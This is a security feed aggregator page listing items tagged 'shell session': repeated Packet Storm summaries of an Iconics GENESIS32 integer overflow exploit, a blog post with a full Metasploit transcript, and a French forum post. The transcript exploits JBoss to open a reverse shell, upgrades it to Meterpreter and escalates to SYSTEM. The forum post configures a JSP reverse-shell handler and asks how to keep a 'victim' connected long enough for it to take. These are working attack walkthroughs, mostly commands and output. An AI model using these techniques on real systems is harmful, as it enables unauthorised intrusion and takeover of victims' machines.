jetlib.sec » Tags » shell-session

Feeds

133445 items (0 unread) in 27 feeds

• 1337day (was: Inj3ct0r, 1337db)
• OSVDB Vulnerabilities
• Exploit-DB
• SecurityFocus Vulnerabilities
• Bugtraq
• Full Disclosure
• XSSed
• Packet Storm Security Headlines
• Packet Storm Security Advisories
• Packet Storm Security Exploits
• Packet Storm Security Recent Files
• Packet Storm Security Tools
• Packet Storm Security Misc. Files
• Sophos security news
• Sophos product advisories
• Penetration Testing
• SecuriTeam
• BackTrack Linux Forums
• Threatpost
• SecDocs
• carnal0wnage.attackresearch.com
• Carnal0wnage
• Kernel Fun
• Darknet
• The Exploitant
• Hack a Day
• Wirevolution

5 items tagged "shell session"

Related tags: overflow [+], memory allocations [+], integer overflow vulnerability [+], integer [+], iconics [+], system shell [+], shell [+], quot [+], msf [+], meterpreter [+], jsp command [+], java jsp [+], information connection [+], exploit [+], deploymentfilerepository [+], debutant [+], Pentesting [+], Espace [+]

• July 18, 2011
• 19:47

  Iconics GENESIS32 Integer Overflow

   » ‎ Packet Storm Security Exploits
  Iconics GENESIS32 version 9.21.201.01 suffers from an integer overflow vulnerability. The GenBroker service on port 38080 is affected by three integer overflow vulnerabilities while handling opcode 0x4b0, which is caused by abusing the the memory allocations needed for the number of elements passed by the client. This results unexpected behaviors such as direct registry calls, memory location calls, or arbitrary remote code execution. Please note that in order to ensure reliability, this exploit will try to open calc (hidden), inject itself into the process, and then open up a shell session. Also, DEP bypass is supported.

  Tags:  iconics integer overflow integer-overflow-vulnerability memory-allocations shell-session  

• 19:47

  Iconics GENESIS32 Integer Overflow

   » ‎ Packet Storm Security Recent Files
  Iconics GENESIS32 version 9.21.201.01 suffers from an integer overflow vulnerability. The GenBroker service on port 38080 is affected by three integer overflow vulnerabilities while handling opcode 0x4b0, which is caused by abusing the the memory allocations needed for the number of elements passed by the client. This results unexpected behaviors such as direct registry calls, memory location calls, or arbitrary remote code execution. Please note that in order to ensure reliability, this exploit will try to open calc (hidden), inject itself into the process, and then open up a shell session. Also, DEP bypass is supported.

  Tags:  iconics integer overflow integer-overflow-vulnerability memory-allocations shell-session  

• 19:47

  Iconics GENESIS32 Integer Overflow

   » ‎ Packet Storm Security Misc. Files
  Iconics GENESIS32 version 9.21.201.01 suffers from an integer overflow vulnerability. The GenBroker service on port 38080 is affected by three integer overflow vulnerabilities while handling opcode 0x4b0, which is caused by abusing the the memory allocations needed for the number of elements passed by the client. This results unexpected behaviors such as direct registry calls, memory location calls, or arbitrary remote code execution. Please note that in order to ensure reliability, this exploit will try to open calc (hidden), inject itself into the process, and then open up a shell session. Also, DEP bypass is supported.

  Tags:  iconics integer overflow integer-overflow-vulnerability memory-allocations shell-session  

• May 09, 2010
• 8:24

  Metasploit jboss deployment file repository exploit

   » ‎ Carnal0wnage
  MC pushed out a new exploit today (jboss_deploymentfilerrepository)
  so while it lists 4.x as vuln, actually several other versions are vulnerable as well including 6.0.0M1 and 5.1.0 :-)
  

  msf exploit(jboss_deploymentfilerepository) > exploit
  
  [*] Started reverse handler on 192.168.1.101:4444
  [*] Triggering payload at '/web-console/HYQ.jsp'...
  [*] Command shell session 3 opened (192.168.1.101:4444 -> 192.168.1.101:57796) at Sun May 09 11:20:31 -0400 2010
  
  Microsoft Windows [Version 5.2.3790]
  (C) Copyright 1985-2003 Microsoft Corp.
  
  C:\Documents and Settings\Administrator\Desktop\jboss-6.0.0.M1\jboss-6.0.0.M1\bin>whoami
  whoami
  win2k3lab\administrator
  
  C:\Documents and Settings\Administrator\Desktop\jboss-6.0.0.M1\jboss-6.0.0.M1\bin>^Z
  Background session 3? [y/N]  y
  msf exploit(jboss_deploymentfilerepository) > sessions -l
  
  Active sessions
  ===============
  
  Id  Type   Information  Connection
  --  ----   -----------  ----------
  3   shell               192.168.1.101:4444 -> 192.168.1.101:57796
  
  msf exploit(jboss_deploymentfilerepository) > sessions -u 3
  
  msf exploit(jboss_deploymentfilerepository) >
  msf exploit(jboss_deploymentfilerepository) > [*] Meterpreter session 4 opened (192.168.1.101:4444 -> 192.168.1.101:36591) at Sun May 09 11:21:32 -0400 2010
  
  msf exploit(jboss_deploymentfilerepository) > sessions -l
  
  Active sessions
  ===============
  
  Id  Type         Information                                      Connection
  --  ----         -----------                                      ----------
  3   shell                                                         192.168.1.101:4444 -> 192.168.1.101:57796
  4   meterpreter  win2k3lab\Administrator @ win2k3lab  192.168.1.101:4444 -> 192.168.1.101:36591
  
  msf exploit(jboss_deploymentfilerepository) > sessions -i 4
  [*] Starting interaction with 4...
  
  meterpreter > getuid
  Server username: win2k3lab\Administrator
  meterpreter > use priv
  Loading extension priv...success.
  meterpreter > getsystem
  ...got system (via technique 1).
  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM
  meterpreter > pwd
  C:\Documents and Settings\Administrator\Desktop\jboss-6.0.0.M1\jboss-6.0.0.M1\bin
  meterpreter > 

  

  Tags:  msf deploymentfilerepository meterpreter jsp-command shell-session information-connection Pentesting  

• January 31, 2010
• 7:05

  Metasploit | PAYLOAD java/jsp_shell_reverse_tcp

   » ‎ remote-exploit & backtrack
  salut je teste le PAYLOAD java/jsp_shell_reverse_tcp (Metasploit Framework 3.3.3), j'ai quelque petite question de noob,
  
  voilà comment je le configure:
  
  msf > use exploit/multi/handler
  msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp
  msf exploit(handler) > set LHOST mon_ip_local
  msf exploit(handler) > set LPORT 4444
  msf exploit(handler) > exploit
  
  ( j'ai bien redirigé le port sur mon routeur )
  
  lorsque que la "victime" se connecte à "mon_ip:4444/exploit"
  j'ai bien des information qui s'affiche dans mon terminal, mais la "victime" ne reste pas sur la page puisqu'elle tombe sur une page blanche,
  donc :[*] Command shell session 1 closed.
  
  peut on personnalisé cette page ? pour forcé la victime à resté dessus le temps que la connexion se fasse ?
  
  autre question:
  
  Payload options (java/jsp_shell_reverse_tcp):
  
  Name Current Setting Required Description
  ---- --------------- -------- -----------
  LHOST 192.168.10.10 yes The local address
  LPORT 4444 yes The local port
  SHELL cmd.exe yes The system shell to use.
  
  quels sont les différentes options possible pour SHELL ?
  pour visé une plateforme linux par exemple ? ( set SHELL gnome-terminal ? )
  
  
  merci de votre aide. Z0rg-

  Tags:  exploit quot shell shell-session java-jsp system-shell Espace debutant